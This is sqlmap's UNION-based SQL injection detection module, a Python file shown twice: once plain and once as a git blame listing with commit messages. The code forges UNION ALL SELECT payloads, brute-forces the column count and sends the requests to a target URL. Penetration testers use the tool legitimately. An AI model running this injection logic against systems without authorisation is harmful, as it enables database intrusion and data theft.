sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import time

from lib.core.agent import agent
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request

def __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count, where=1):
    validPayload = None
    vector = None

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for position in range(0, count):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed, dbms=dbms)

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, place=place, content=True)

        if resultPage and randQuery in resultPage and " UNION ALL SELECT " not in resultPage:
            validPayload = payload
            vector = (position, count, comment, prefix, suffix, conf.uChar, where)

            if where == 1:
                # Prepare expression with delimiters
                randQuery2 = randomStr()
                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2, dbms=dbms)

                # Confirm that it is a full inband SQL injection
                query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
                payload = agent.payload(place=place, parameter=parameter, newValue=query, where=2)

                # Perform the request
                resultPage, _ = Request.queryPage(payload, place=place, content=True)

                if resultPage and " UNION ALL SELECT " not in resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):
                    vector = (position, count, comment, prefix, suffix, conf.uChar, 2)

            break

    return validPayload, vector

def __unionConfirm(comment, place, parameter, value, prefix, suffix, dbms, count):
    validPayload = None
    vector = None

    # Confirm the inband SQL injection and get the exact column
    # position which can be used to extract data
    validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count)

    # Assure that the above function found the exploitable full inband
    # SQL injection position
    if not validPayload:
        validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count, where=2)

    return validPayload, vector

def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix, dbms):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    validPayload = None
    vector = None
    query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)

    for count in range(conf.uColsStart, conf.uColsStop+1):
        if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        if count:
            query += ", %s" % conf.uChar

        if kb.dbms == DBMS.ORACLE:
            query += " FROM DUAL"

        status = '%d/%d (%d%s)' % (count, conf.uColsStop, round(100.0*count/conf.uColsStop), '%')
        debugMsg = "testing number of columns: %s" % status
        logger.debug(debugMsg)

        validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, dbms, count)

        if validPayload:
            break

    clearConsoleLine(True)

    return validPayload, vector

def unionTest(comment, place, parameter, value, prefix, suffix, dbms):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    oldTechnique = kb.technique
    kb.technique = PAYLOAD.TECHNIQUE.UNION
    validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix, dbms)

    if validPayload:
        validPayload = agent.removePayloadDelimiters(validPayload, False)

    return validPayload, vector
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

adding progress to --union-test 2011-01-06 12:26:01 +03:00			`import time`

After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.agent import agent`
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`from lib.core.common import clearConsoleLine`
			`from lib.core.common import dataToStdout`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`from lib.core.common import getUnicode`
			`from lib.core.common import parseUnionPage`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
minor update 2010-12-08 16:09:27 +03:00			`from lib.core.enums import PAYLOAD`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`def __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count, where=1):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`for position in range(0, count):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`randQueryUnescaped = unescaper.unescape(randQueryProcessed, dbms=dbms)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Forge the inband SQL injection request`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Perform the request`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`resultPage, _ = Request.queryPage(payload, place=place, content=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Proper fix to avoid UNION test false positives 2011-01-12 02:59:02 +03:00			`if resultPage and randQuery in resultPage and " UNION ALL SELECT " not in resultPage:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`if where == 1:`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`# Prepare expression with delimiters`
			`randQuery2 = randomStr()`
			`randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)`
Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2, dbms=dbms)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Confirm that it is a full inband SQL injection`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Perform the request`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`resultPage, _ = Request.queryPage(payload, place=place, content=True)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
Minor bug fix 2011-01-13 13:29:47 +03:00			`if resultPage and " UNION ALL SELECT " not in resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, 2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`break`

Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`def __unionConfirm(comment, place, parameter, value, prefix, suffix, dbms, count):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`# position which can be used to extract data`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not validPayload:`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, dbms, count, where=2)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix, dbms):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`for count in range(conf.uColsStart, conf.uColsStop+1):`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query = query[:-len(" FROM DUAL")]`

First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`if count:`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query += ", %s" % conf.uChar`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE:`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query += " FROM DUAL"`

Added generic and mysql UNION tests from 1 to 25 columns. Adapted config file and command line removing now outdated --union-test switch. Minor bug fix. Minor code refactoring. Got rid of some debug messages, standardized logging of UNION tests. 2011-01-12 01:56:21 +03:00			`status = '%d/%d (%d%s)' % (count, conf.uColsStop, round(100.0*count/conf.uColsStop), '%')`
			`debugMsg = "testing number of columns: %s" % status`
			`logger.debug(debugMsg)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, dbms, count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`if validPayload:`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`break`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`clearConsoleLine(True)`

Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Fixed previous bug in getErrorParsedDBMSes() call in detection phase. Added minor support to escape quotes in UNION payloads during detection phase. 2011-01-12 02:47:32 +03:00			`def unionTest(comment, place, parameter, value, prefix, suffix, dbms):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

Bug fix for --union-test 2010-12-03 17:57:30 +03:00			`oldTechnique = kb.technique`
minor update 2010-12-08 16:09:27 +03:00			`kb.technique = PAYLOAD.TECHNIQUE.UNION`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix, dbms)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`if validPayload:`
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`validPayload = agent.removePayloadDelimiters(validPayload, False)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`